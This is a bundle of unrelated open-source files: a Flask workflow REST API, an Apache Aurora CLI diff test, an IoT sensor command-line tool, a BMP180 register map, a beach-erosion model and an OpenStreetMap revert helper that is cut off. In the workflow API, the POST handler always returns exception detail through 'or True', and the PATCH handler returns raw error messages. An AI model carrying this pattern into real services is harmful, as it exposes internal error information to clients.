lambda v: Workflow.publishing_status == PublishingStatus.PUBLISHED)
# is_track_filter = request.args.get('track')
# if is_track_filter:
# workflows = workflows.filter(
# Workflow.publishing_enabled == (is_track_filter != 'false'))
# is_published = request.args.get('published')
# if is_published:
# workflows = workflows.filter(
# Workflow.publishing_status == PublishingStatus.PUBLISHED)
workflows = test_and_apply_filter(request, 'enabled', workflows,
lambda v: Workflow.enabled == (v != 'false'))
# enabled_filter = request.args.get('enabled')
# if enabled_filter:
# workflows = workflows.filter(
# Workflow.enabled == (enabled_filter != 'false'))
workflows = test_and_apply_filter(request, 'template', workflows,
lambda v: or_(and_(Workflow.user_id == g.user.id,
Workflow.is_template),
Workflow.is_system_template))
# template_only = request.args.get('template')
# if template_only is not None:
# template_only = template_only in ['1', 'true', 'True']
# else:
# template_only = False
# if template_only:
# workflows = workflows.filter(
# or_(and_(Workflow.user_id == g.user.id,
# Workflow.is_template),
# Workflow.is_system_template))
workflows = test_and_apply_filter(request, 'name', workflows,
lambda v: Workflow.name.like('%%{}%%'.format(v)))
# name_filter = request.args.get('name')
# if name_filter:
# workflows = workflows.filter(
# Workflow.name.like(
# '%%{}%%'.format(name_filter)))
workflows = filter_by_permissions(
workflows, list(PermissionType.values()))
sort = request.args.get('sort', 'name')
if sort not in ['name', 'id', 'user_name', 'updated', 'created']:
sort = 'name'
sort_option = getattr(Workflow, sort)
if request.args.get('asc', 'true') == 'false':
sort_option = sort_option.desc()
workflows = optimize_workflow_query(
workflows.order_by(sort_option))
page = int(request.args.get('page', 1))
page_size = int(request.args.get('size', 20))
page = int(page)
pagination = workflows.paginate(page, page_size, False)
if pagination.total < (page - 1) * page_size and page != 1:
# Nothing in that specified page, return to page 1
pagination = workflows.paginate(1, page_size, False)
result = {
'data': WorkflowListResponseSchema(many=True,
only=only).dump(
pagination.items),
'pagination': {'page': page, 'size': page_size,
'total': pagination.total,
'pages': pagination.total / page_size + 1}}
return result
except Exception as e:
log.exception(e)
result = dict(status="ERROR", message="Internal error")
if current_app.debug:
result['debug_detail'] = str(e)
return result, 500
@staticmethod
@requires_auth
def post():
result, result_code = dict(
status="ERROR", message="Missing json in the request body"), 400
if request.args.get('source'):
original = Workflow.query.get(int(request.args.get('source')))
response_schema = WorkflowItemResponseSchema()
cloned = response_schema.dump(original)
# User field is not present in constructor
platform = cloned.pop('platform')
cloned['platform'] = Platform.query.get(platform['id'])
cloned['user_id'] = g.user.id
cloned['user_login'] = g.user.login
cloned['user_name'] = g.user.name
for task in cloned['tasks']:
task['id'] = str(uuid.uuid4())
task['operation_id'] = task['operation']['id']
cloned['platform_id'] = cloned['platform']['id']
request_schema = WorkflowCreateRequestSchema()
workflow = request_schema.load(cloned)
elif request.json:
data = request.json
if 'user' in data:
data.pop('user')
request_schema = WorkflowCreateRequestSchema()
response_schema = WorkflowItemResponseSchema()
for task in data.get('tasks', {}):
task['operation_id'] = task['operation']['id']
task['forms'] = {k: v for k, v in list(task['forms'].items())
if v.get('value') is not None or
v.get('publishing_enabled') == True}
params = {}
params.update(data)
params['user_id'] = g.user.id
params['user_login'] = g.user.login
params['user_name'] = g.user.name
params['platform_id'] = params.get('platform', {}).get(
'id') or params.get('platform_id')
params['subset_id'] = params.get('subset_id')
workflow = request_schema.load(params)
else:
return result, result_code
try:
db.session.add(workflow)
db.session.flush()
update_port_name_in_flows(db.session, workflow.id)
result, result_code = response_schema.dump(
workflow), 200
if workflow.is_template:
workflow.template_code = result
db.session.add(workflow)
db.session.commit()
except ValidationError as e:
result = {
'status': 'ERROR',
'message': gettext('Validation error'),
'errors': e.messages
}
except Exception as e:
log.exception('Error in POST')
result, result_code = dict(status="ERROR",
message="Internal error"), 500
if current_app.debug or True:
result['debug_detail'] = str(e)
db.session.rollback()
return result, result_code
class WorkflowDetailApi(Resource):
""" REST API for a single instance of class Workflow """
@staticmethod
@requires_auth
def get(workflow_id):
workflow = get_workflow(workflow_id)
if workflow is not None:
return WorkflowItemResponseSchema().dump(workflow)
else:
return dict(status="ERROR", message="Not found"), 404
@staticmethod
@requires_auth
def delete(workflow_id):
result, result_code = dict(status="ERROR", message="Not found"), 404
filtered = filter_by_permissions(
Workflow.query, [PermissionType.WRITE])
workflow = filtered.filter(Workflow.id == workflow_id).first()
if workflow is not None:
try:
# db.session.delete(workflow)
# soft delete
workflow.enabled = False
db.session.commit()
result, result_code = dict(status="OK", message="Deleted"), 200
except Exception as e:
log.exception('Error in DELETE')
result, result_code = dict(status="ERROR",
message="Internal error"), 500
if current_app.debug:
result['debug_detail'] = str(e)
db.session.rollback()
return result, result_code
@staticmethod
@requires_auth
def patch(workflow_id):
result = dict(status="ERROR", message="Insufficient data")
result_code = 404
try:
if request.json:
data = request.json
save_history = data.get('history', '1') == '1'
request_schema = partial_schema_factory(
WorkflowCreateRequestSchema)
for task in data.get('tasks', {}):
task['forms'] = {k: v for k, v in
list(task['forms'].items())
if v.get('value') is not None or
v.get('publishing_enabled') == True}
task['operation_id'] = task['operation']['id']
for variable in data.get('variables', []):
variable['parameters'] = json.dumps(variable['parameters'])
# Ignore missing fields to allow partial updates
params = {}
params.update(data)
if 'platform_id' in params and params['platform_id'] is None:
params.pop('platform_id')
if 'user' in params:
del params['user']
# Only with permission
if not ('ADMINISTRATOR' in g.user.permissions) and \
'is_system_template' in params:
del params['is_system_template']
# Keeps the same owner
# params['user_id'] = g.user.id
# params['user_login'] = g.user.login
# params['user_name'] = g.user.name
if params.get('forms') is not None:
params['forms'] = json.dumps(params['forms'])
else:
params['forms'] = '{}'
response_schema = WorkflowItemResponseSchema()
workflow = request_schema.load(params, partial=True)
filtered = filter_by_permissions(
Workflow.query, [PermissionType.WRITE])
temp_workflow = filtered.filter(
Workflow.id == workflow_id).first()
if temp_workflow is not None:
workflow.id = workflow_id
workflow.updated = datetime.datetime.utcnow()
workflow = db.session.merge(workflow)
if (workflow.publishing_enabled and
workflow.publishing_status is None):
workflow.publishing_status = PublishingStatus.EDITING
db.session.flush()
update_port_name_in_flows(db.session, workflow.id)
db.session.commit()
historical_data = json.dumps(
response_schema.dump(workflow))
# if workflow.is_template:
# workflow.template_code = historical_data
if save_history:
history = WorkflowHistory(
user_id=g.user.id, user_name=g.user.name,
user_login=g.user.login,
version=workflow.version,
workflow=workflow, content=historical_data)
db.session.add(history)
db.session.commit()
if workflow is not None:
result, result_code = dict(
status="OK", message="Updated",
data=response_schema.dump(
workflow)), 200
else:
result = dict(status="ERROR",
message="Not found")
except ValidationError as e:
result = {
'status': 'ERROR',
'message': gettext('Validation error'),
'errors': e.messages
}
except Exception as e:
log.exception('Error in PATCH')
result_code = 500
import sys
result = {'status': "ERROR", 'message': sys.exc_info()[1]}
return result, result_code
class WorkflowHistoryApi(Resource):
@staticmethod
@requires_auth
def post(workflow_id):
result, result_code = dict(status="ERROR", message="Not found"), 404
params = request.json
if 'version' in params:
workflow = get_workflow(workflow_id)
if workflow.user_id == g.user.id:
history = WorkflowHistory.query.filter(
WorkflowHistory.workflow_id == workflow_id,
WorkflowHistory.version == int(params['version'])).one()
# return json.load(history.content), 200
old = json.loads(history.content)
old['platform_id'] = old['platform']['id']
old['user_id'] = g.user.id
old['user_login'] = g.user.login
old['user_name'] = g.user.name
del old['user']
for i, task in enumerate(old['tasks']):
task['operation_id'] = task['operation']['id']
if not task.get('name'):
task['name'] = '{} {}'.format(task['operation']['name'],
i)
rw = WorkflowCreateRequestSchema().load(old)
if rw.errors:
result_code = 400
result = dict(
status="ERROR",
message="Version {} is not compatible anymore.".format(
params['version']))
else:
result = old
result_code = 200
else:
result, result_code = dict(status="ERROR",
message="Not authorized"), 401
return result, result_code
@staticmethod
@requires_auth
def get(workflow_id):
history = WorkflowHistory.query.filter(
WorkflowHistory.workflow_id == workflow_id).order_by(
WorkflowHistory.date.desc()).limit(20)
only = ('id', 'date', 'version', 'user_name')
return {'data': WorkflowHistoryListResponseSchema(
many=True, only=only).dump(history)}
class WorkflowAddFromTemplateApi(Resource):
@staticmethod
@requires_auth
def post():
params = request.json
if 'template_id' in params and params.get('template_id'):
workflow_id = int(params.get('template_id'))
workflow = get_workflow(workflow_id)
if workflow.user_id == g.user.id or workflow.is_system_template:
# clone workflow
response_schema = WorkflowItemResponseSchema()
cloned = json.loads(
json.dumps(response_schema.dump(workflow)))
cloned['platform_id'] = cloned['platform']['id']
cloned['user_id'] = g.user.id
cloned['user_login'] = g.user.login
cloned['user_name'] = g.user.name
cloned['name'] = params.get('name', 'workflow')
cloned['is_template'] = False
cloned['is_system_template'] = False
# Marshmallow converts JSON value to dict and it causes
# problems when saving data (issue #136);
cloned['forms'] = workflow.forms
del cloned['user']
old_task_ids = {}
for i, task in enumerate(cloned['tasks']):
new_task_id = str(uuid.uuid4())
old_task_ids[task['id']] = new_task_id
task['id'] = new_task_id
task['operation_id'] = task['operation']['id']
if not task.get('name'):
task['name'] = '{} {}'.format(task['operation']['name'],
i)
for flow in cloned['flows']:
flow['source_id'] = old_task_ids[flow['source_id']]
flow['target_id'] = old_task_ids[flow['target_id']]
request_schema = WorkflowCreateRequestSchema()
form = request_schema.load(cloned)
if not form.errors:
new_workflow = form
db.session.add(new_workflow)
db.session.flush()
db.session.commit()
result, result_code = response_schema.dump(
new_workflow), 200
else:
result, result_code = dict(status="ERROR",
message="Not authorized"), 401
else:
result, result_code = dict(status="ERROR",
message="Not authorized"), 401
else:
result, result_code = dict(status="ERROR", message="Not found"), 404
return result, result_code
@staticmethod
@requires_auth
def get(workflow_id):
history = WorkflowHistory.query.filter(
WorkflowHistory.workflow_id == workflow_id).order_by(
WorkflowHistory.date.desc()).limit(20)
only = ('id', 'date', 'version', 'user_name')
return {'data': WorkflowHistoryListResponseSchema(
many=True, only=only).dump(history)}
class WorkflowPermissionApi(Resource):
""" REST API for sharing a Workflow """
@staticmethod
@requires_auth
def post(workflow_id, user_id):
result, result_code = dict(
status="ERROR",
message=gettext('Missing json in the request body')), 400
if request.json is not None:
form = request.json
to_validate = ['permission', 'user_name', 'user_login']
error = False
for check in to_validate:
if check not in form or form.get(check, '').strip() == '':
result, result_code = dict(
status="ERROR", message=gettext('Validation error'),
errors={'Missing': check}), 400
error = True
break
if check == 'permission' and form.get(
'permission') not in list(PermissionType.values()):
result, result_code = dict(
status="ERROR", message=gettext('Validation error'),
errors={'Invalid': check}), 400
error = True
break
if not error:
try:
                    filtered = filter_by_permissions(
Workflow.query, [PermissionType.WRITE])
workflow = filtered.filter(
Workflow.id == workflow_id).first()
if workflow is not None:
conditions = [WorkflowPermission.workflow_id ==
workflow_id,
WorkflowPermission.user_id == user_id]
permission = WorkflowPermission.query.filter(
*conditions).first()
action_performed = 'Added'
if permission is not None:
action_performed = 'Updated'
permission.permission = form['permission']
else:
permission = WorkflowPermission(
workflow=workflow, user_id=user_id,
user_name=form['user_name'],
user_login=form['user_login'],
permission=form['permission'])
db.session.add(permission)
db.session.commit()
result, result_code = {'message': action_performed,
'status': 'OK'}, 200
else:
result, result_code = dict(
status="ERROR",
message=gettext("%(type)s not found.",
type=gettext('Data source'))), 404
except Exception as e:
log.exception('Error in POST')
result, result_code = dict(status="ERROR",
message=gettext(
"Internal error")), 500
if current_app.debug:
result['debug_detail'] = str(e)
db.session.rollback()
return result, result_code
@staticmethod
@requires_auth
def delete(workflow_id, user_id):
result, result_code = dict(status="ERROR",
message=gettext("%(type)s not found.",
type=gettext(
'Data source'))), 404
filtered = _filter_by_permissions(Workflow.query,
[PermissionType.WRITE])
workflow = filtered.filter(Workflow.id == workflow_id).first()
if workflow is not None:
permission = WorkflowPermission.query.filter(
WorkflowPermission.workflow_id == workflow_id,
WorkflowPermission.user_id == user_id).first()
if permission is not None:
try:
db.session.delete(permission)
db.session.commit()
result, result_code = dict(
status="OK",
message=gettext("%(what)s was successively deleted",
what=gettext('Workflow'))), 200
except Exception as e:
log.exception('Error in DELETE')
result, result_code = dict(status="ERROR",
message=gettext(
"Internal error")), 500
if current_app.debug:
result['debug_detail'] = str(e)
db.session.rollback()
return result, result_code
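# ---------------------------------------------------------------------------
# Hedged wiring sketch (not part of this module): one plausible Flask-RESTful
# registration for the resources above. The `api` object and the URL pattern
# are illustrative assumptions only and are not taken from this project.
#
# api.add_resource(WorkflowPermissionApi,
#                  '/workflows/<int:workflow_id>/permissions/<int:user_id>')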
| StarcoderdataPython |
3218915 | <filename>Chapter4/Aurora/src/test/python/apache/aurora/client/cli/test_diff.py
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import contextlib
import os
import textwrap
from mock import Mock, call, patch
from pystachio import Empty
from apache.aurora.client.api import SchedulerProxy
from apache.aurora.client.cli import EXIT_OK
from apache.aurora.client.cli.jobs import DiffCommand
from apache.aurora.client.cli.options import TaskInstanceKey
from apache.aurora.config import AuroraConfig
from apache.aurora.config.schema.base import Job
from apache.thermos.config.schema_base import MB, Process, Resources, Task
from .util import AuroraClientCommandTest, FakeAuroraCommandContext, mock_verb_options
from gen.apache.aurora.api.constants import ACTIVE_STATES
from gen.apache.aurora.api.ttypes import (
ConfigGroup,
GetJobUpdateDiffResult,
PopulateJobResult,
Range,
ResponseCode,
Result,
ScheduleStatusResult,
TaskQuery
)
class TestDiffCommand(AuroraClientCommandTest):
def setUp(self):
self._command = DiffCommand()
self._mock_options = mock_verb_options(self._command)
self._mock_options.instance_spec = TaskInstanceKey(self.TEST_JOBKEY, [0, 1])
self._fake_context = FakeAuroraCommandContext()
self._fake_context.set_options(self._mock_options)
self._mock_api = self._fake_context.get_api("test")
@classmethod
    def get_job_config(cls, is_cron=False):
return AuroraConfig(job=Job(
cluster='west',
role='bozo',
environment='test',
name='the_job',
service=True if not is_cron else False,
cron_schedule='* * * * *' if is_cron else Empty,
task=Task(
name='task',
processes=[Process(cmdline='ls -la', name='process')],
resources=Resources(cpu=1.0, ram=1024 * MB, disk=1024 * MB)
),
instances=3,
))
@classmethod
def create_status_response(cls):
resp = cls.create_simple_success_response()
resp.result = Result(
scheduleStatusResult=ScheduleStatusResult(tasks=set(cls.create_scheduled_tasks())))
return resp
@classmethod
def create_failed_status_response(cls):
return cls.create_blank_response(ResponseCode.INVALID_REQUEST, 'No tasks found for query')
@classmethod
def populate_job_config_result(cls):
populate = cls.create_simple_success_response()
populate.result = Result(populateJobResult=PopulateJobResult(
taskConfig=cls.create_scheduled_tasks()[0].assignedTask.task))
return populate
@classmethod
def get_job_update_diff_result(cls):
diff = cls.create_simple_success_response()
task = cls.create_task_config('foo')
diff.result = Result(getJobUpdateDiffResult=GetJobUpdateDiffResult(
add=set([ConfigGroup(
config=task,
instances=frozenset([Range(first=10, last=10), Range(first=12, last=14)]))]),
remove=frozenset(),
update=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=11, last=11)]))]),
unchanged=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=0, last=9)]))])
))
return diff
def test_service_diff(self):
config = self.get_job_config()
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.return_value = self.get_job_update_diff_result()
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert "\n".join(self._fake_context.get_out()) == textwrap.dedent("""\
This job update will:
add instances: [10], [12-14]
update instances: [11]
with diff:\n\n
not change instances: [0-9]""")
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
def test_service_diff_old_api(self):
config = self.get_job_config()
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.side_effect = SchedulerProxy.ThriftInternalError("Expected")
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
def test_cron_diff(self):
config = self.get_job_config(is_cron=True)
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
| StarcoderdataPython |
156271 | #!/usr/bin/env python3
"""
Command line interface for the Ivaldi IoT scientific sensor client.
"""
# Standard library imports
import argparse
import sys
# Local imports
import ivaldi
import ivaldi.monitor
import ivaldi.link
def generate_arg_parser():
"""
Generate the argument parser for Ivaldi.
Returns
-------
arg_parser : argparse.ArgumentParser
The generated argument parser instance.
"""
parser_main = argparse.ArgumentParser(
description="A lightweight client for monitoring IoT sensors.",
argument_default=argparse.SUPPRESS)
parser_main.add_argument(
"--version", action="store_true",
help="Print the Ivaldi version and exit")
subparsers = parser_main.add_subparsers(
title="Commands", help="Subcommand to execute", metavar="Command")
parser_monitor = subparsers.add_parser(
"monitor", help="Monitor the sensor status and print to the terminal",
argument_default=argparse.SUPPRESS)
parser_monitor.set_defaults(func=ivaldi.monitor.start_monitoring)
parser_send = subparsers.add_parser(
"send", help="Monitor the connected sensor and send the data via UART",
argument_default=argparse.SUPPRESS)
parser_send.set_defaults(func=ivaldi.link.send_monitoring_data)
parser_recieve = subparsers.add_parser(
"recieve", help="Recieve and print the IoT sensor data via UART",
argument_default=argparse.SUPPRESS)
parser_recieve.set_defaults(func=ivaldi.link.recieve_monitoring_data)
for parser in [parser_monitor, parser_send]:
parser.add_argument(
"pin_rain", type=int,
help="GPIO pin to use for rain gauge, in BCM (Broadcom) numbering")
parser.add_argument(
"pin_wind", type=int,
help="GPIO pin to use for wind speed, in BCM (Broadcom) numbering")
parser.add_argument(
"channel_wind", type=int,
help="ADC channel (0-3) to use for the wind direction sensor")
parser.add_argument(
"channel_soil", type=int,
help="ADC channel (0-3) to use for the soil moisture sensor")
parser.add_argument(
"--period-s", type=float, help="Update period, in s")
for parser in [parser_monitor, parser_recieve]:
parser.add_argument(
"--output-path", help="CSV file to output to, none if not passed")
parser.add_argument(
"--log", action="store_true",
help="Print every update to a new line")
for parser in [parser_send, parser_recieve]:
parser.add_argument(
"--serial-device",
help="The UART device to use (e.g. '/dev/ttyAMA0')")
return parser_main
def main():
"""
Parse command line arguments and start the sensor monitor mainloop.
Returns
-------
None.
"""
arg_parser = generate_arg_parser()
parsed_args = arg_parser.parse_args()
if getattr(parsed_args, "version", None):
print(f"Ivaldi version {ivaldi.__version__}")
sys.exit()
func_to_dispatch = parsed_args.func
del parsed_args.func
func_to_dispatch(**vars(parsed_args))
if __name__ == "__main__":
main()
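# Hedged command-line sketch (the GPIO pins, ADC channels and file name below
# are assumed example values, not recommendations from this module):
#   ivaldi monitor 26 19 0 1 --period-s 1 --log --output-path sensor_data.csv
#   ivaldi send 26 19 0 1 --serial-device /dev/ttyAMA0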
| StarcoderdataPython |
1783280 | # Copyright (C) 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Auto-generated file for BMP180 v0.1.0.
# Generated from peripherals/BMP180.yaml using Cyanobyte Codegen v0.1.0
from i2cdevice import Device, Register, BitField
I2C_ADDR = 119
CONTROL = Register('CONTROL', 244, read_only=False, bitwidth=8)
PRESSURECALAC1 = Register('PRESSURECALAC1', 170, read_only=True, bitwidth=16)
PRESSURECALAC2 = Register('PRESSURECALAC2', 172, read_only=True, bitwidth=16)
PRESSURECALVB1 = Register('PRESSURECALVB1', 182, read_only=True, bitwidth=16)
PRESSURECALVB2 = Register('PRESSURECALVB2', 184, read_only=True, bitwidth=16)
RESULT = Register('RESULT', 246, read_only=True, bitwidth=16)
TEMPCAL3 = Register('TEMPCAL3', 174, read_only=True, bitwidth=16)
TEMPCAL4 = Register('TEMPCAL4', 176, read_only=True, bitwidth=16)
TEMPCAL5 = Register('TEMPCAL5', 178, read_only=True, bitwidth=16)
TEMPCAL6 = Register('TEMPCAL6', 180, read_only=True, bitwidth=16)
TEMPCALMC = Register('TEMPCALMC', 188, read_only=True, bitwidth=16)
TEMPCALMD = Register('TEMPCALMD', 190, read_only=True, bitwidth=16)
bmp180 = Device(I2C_ADDR, registers=(
CONTROL,
PRESSURECALAC1,
PRESSURECALAC2,
PRESSURECALVB1,
PRESSURECALVB2,
RESULT,
TEMPCAL3,
TEMPCAL4,
TEMPCAL5,
TEMPCAL6,
TEMPCALMC,
TEMPCALMD
)) | StarcoderdataPython |
184985 | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 24 15:53:51 2016
@author: jdorvinen
"""
import numpy as np
def kriebel_dean(w_cm, B, D, W, m, S, T_d, H_b, gamma=0.78):
'''Calculates storm erosion based on the method presented in,
<NAME>., and <NAME>., 'Convolution method for time-dependent
beach-profile response' J. Waterway, Port, Coastal, Ocean Eng., 1993,
119(2): 204-226
Inputs:
REQUIRED \n
w_cm = sediment fall velocity (cm/s) \n
B = Berm height above mean sea-level (meters) \n
D = Dune height (meters) \n
W = Width of the back-shore (meters) \n
m = Linear beach face slope (m/m) \n
S = Water-level rise ('storm-surge') (meters) \n
T_d = Storm duration (hours) \n
H_b = Breaking wave height (meters) \n
OPTIONAL \n
gamma = Breaker index, usually taken to be 0.78-1.0 \n
Returns:
V_max = Maximum shoreline erosion volume (m**3) \n
R_max = Maximum shoreline erosion distance (m)
'''
# Constants
g = 9.8066 # gravitational acceleration (m/s/s)
# Sediment data
#d_50 = 0.3 # mass-mean sediment grain-size diameter (mm)
w_cm = w_cm # sediment fall velocity (cm/s)
w = w_cm/100 # m/sec
# Profile data
# Based on equilibrium profile of the form 'x=(h/A)**(3/2)', where h = the
# water depth at a distance x offshore from the still-water level
A = 2.25*((w**2)/g)**(1/3) # Eq. 15 'parameter governs profile steepness'
# valid for sand where 0.1mm < d_50 < 0.4mm
B = B # Berm height above mean sea-level (meters)
D = D # Dune height (meters)
W = W # Width of the back-shore (meters)
m = m # Linear beach face slope (m/m)
# Storm data
S = S # given water-level rise ('storm-surge') (meters)
T_d = T_d # Storm duration (hours)
gamma = gamma # Breaker index, usually taken to be 0.78-1.0.
H_b = H_b # Breaking wave height (meters)
h_b = H_b/gamma # Breaking depth, assumed to remain constant (meters)
# Active profile width 'x_b', x_0 = the distance from the still-water
# shoreline to the virtual origin of the concave equilibrium profile form,
# given by x_0 = h_T/3m, where h_T is the depth at which the linear slope
# is tangent to the concave profile, which may be shown to equal
# 4A**3/9m**2.
h_T = (4/9)*(A**3/m**2) # Eq. 16b_1
x_0 = h_T/(3*m) # Eq. 16b_2
x_b = x_0+(h_b/A)**(3/2) # Eq. 23
# Calculate erosion potential
# Maximum erosion potential, 'R_inf', and maximum potential volume eroded,
# 'V_inf', based on an equilibrium profile with a linear beach slope.
#R_inf = S*(x_b-(h_b/m)) / (B+h_b-(S/2)) # Eq. 22
#V_inf = R_inf*B + (S**2)/(2*m) - (2/5)*(S**(5/2))/(A**(3/2)) # Eq. 24
# Calculate maximum erosion potential 'R_inf' and maximum potential volume
# eroded 'V_inf' based on an equilibrium profile with a dune.
# Dune with no back-shore.
# R_inf = S*(x_b-(h_b/m))/(B+D+h_b-(S/2)) # Eq. 25
# Dune with a wide back-shore.
R_inf = (S*(x_b-(h_b/m)) - (W*(B+h_b-(S/2)))) / (B+D+h_b-(S/2)) # Eq. 26
# Volume eroded
V_inf = R_inf*D + (R_inf+W)*(B-S) # Eq. 27 --> used in K&D examples
# Volume eroded above original sea level #Eq. 28
# V_minf = R_inf*D +(R_inf+W)*B+(S**2)/(2*m)-(2/5)*(S**(5/2))/(A**(3/2))
# Calculate erosion timescale
# Time scale of profile response
C_1 = 320 # Empirical coefficient from Kriebel and Dean 1993
# Time scale parameter # Eq.31 (sec)
T_sec = ((H_b**(3/2))/(g**(1/2) * A**3)) / (1+(h_b/B)+(m*x_b)/h_b)
T_s = C_1*T_sec/3600 # convert seconds to hours
# Combine erosion potential and timescale
# Beach response to idealized storm surge
alpha = 1/T_s
sigma = np.pi/T_d
beta = 2*sigma/alpha # 2*np.pi*(T_s/T_d)
# Eq. 10
# R_t/R_inf=0.5*(1 - \
# (beta**2/(1+beta**2))*np.exp(-(2*sigma*t)/beta) - \
# (1/(1+beta**2))*(np.cos(2*sigma*t)+beta*np.sin(2*sigma*t)))
# Setting time derivative of Eq. 10 to zero leads to Eq. 12, where t_max is
# the time at which maximum erosion will take place.
def find_t_max(t_max):
""" doc string """
zero = np.cos(2*sigma*t_max) - \
(1/beta)*np.sin(2*sigma*t_max) - \
np.exp(-(2*sigma*t_max)/beta) # Eq. 12
return zero
# This can then be solved iteratively to find the time at which maximum
# erosion occurs, 't_max' (hrs)
import scipy.optimize as opt
t_max = opt.brentq(find_t_max,
a=T_d/2,
b=T_d)
# Finally calculate maximum shoreline recession and volumetric erosion for
# the given storm parameters.
R_max = R_inf*0.5*(1-np.cos(2*sigma*t_max)) # Eq. 13
V_max = V_inf*(R_max/R_inf)
# Turn this block on if need to debug
'''
print("R_max: {:.1f} (m)".format(R_max))
print("R_inf: {:.1f} (m)".format(R_inf))
print("R_max/R_inf: {:.2f}".format(R_max/R_inf))
print("V_max: {:.1f} (m**3/m)".format(V_max))
print("V_inf: {:.1f} (m**#/m)".format(V_inf))
print("T_s: {:.2f} (h)".format(T_s))
print("t_max: {:.1f} (h)".format(t_max))
print("A: {:.3f}".format(A))
print("alpha: {:.3f} (1/h)".format(alpha))
print("beta: {:.3f}".format(beta))
print("sigma: {:.3f}".format(sigma))
'''
return (V_max, R_max, V_inf, R_inf)
def recovery(V_max, interim, T_a=400):
'''Calculate eroded sand-volume post recovery during storm interim.
Inputs:
V_max = Initially erroded volume (m**3)
interim = Period of calm between storms (h)
T_a = Characteristic accretive timescale (h)
Outputs:
V_recoverd = Eroded volume remaining after recovery (m**3)
'''
from numpy import exp
V_recovered = V_max*exp(-1*interim/T_a) # Eq. 28 Callaghan et al. 2008
return V_recovered
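# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). The storm and beach
# numbers below are illustrative assumptions chosen only to show how
# kriebel_dean() and recovery() are meant to be chained together.
if __name__ == "__main__":
    V_max, R_max, V_inf, R_inf = kriebel_dean(w_cm=3.0,   # fall velocity (cm/s), assumed
                                              B=1.0,      # berm height (m), assumed
                                              D=2.5,      # dune height (m), assumed
                                              W=20.0,     # back-shore width (m), assumed
                                              m=0.1,      # beach face slope, assumed
                                              S=1.2,      # storm surge (m), assumed
                                              T_d=18.0,   # storm duration (h), assumed
                                              H_b=2.0)    # breaking wave height (m), assumed
    # Eroded volume still remaining after an assumed 72-hour calm between storms
    V_left = recovery(V_max, interim=72.0)
    print("V_max={:.1f} m^3/m, R_max={:.1f} m, after recovery={:.1f} m^3/m".format(
        V_max, R_max, V_left))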
| StarcoderdataPython |
4840484 | # Common constants and functions for reverting scripts.
import getpass
import base64
import logging
import re
import requests
try:
from lxml import etree
except ImportError:
try:
import xml.etree.cElementTree as etree
except ImportError:
import xml.etree.ElementTree as etree
try:
input = raw_input
except NameError:
pass
API_ENDPOINT = 'https://api.openstreetmap.org/api/0.6/'
class HTTPError(Exception):
def __init__(self, code, message):
self.code = code
self.message = message
def __str__(self):
return 'HTTPError({}, {})'.format(self.code, self.message)
class RevertError(Exception):
def __init__(self, msg):
self.message = msg
def __str__(self):
return 'RevertError({})'.format(self.message)
def api_request(endpoint, method='GET', sysexit_message=None,
raw_result=False, headers=None, **kwargs):
if not headers:
headers = {}
headers['Content-Type'] = 'application/xml'
try:
resp = requests.request(method, API_ENDPOINT + endpoint, headers=headers, **kwargs)
resp.encoding = 'utf-8'
if resp.status_code != 200:
raise HTTPError(resp.status_code, resp.text)
if resp.content and not raw_result:
return etree.fromstring(resp.content)
except Exception as e:
if sysexit_message is not None:
raise RevertError(': '.join((sysexit_message, str(e))))
raise e
return resp.text
def read_auth():
"""Read login and password from keyboard, and prepare an basic auth header."""
ok = False
while not ok:
login = input('OSM Login: ')
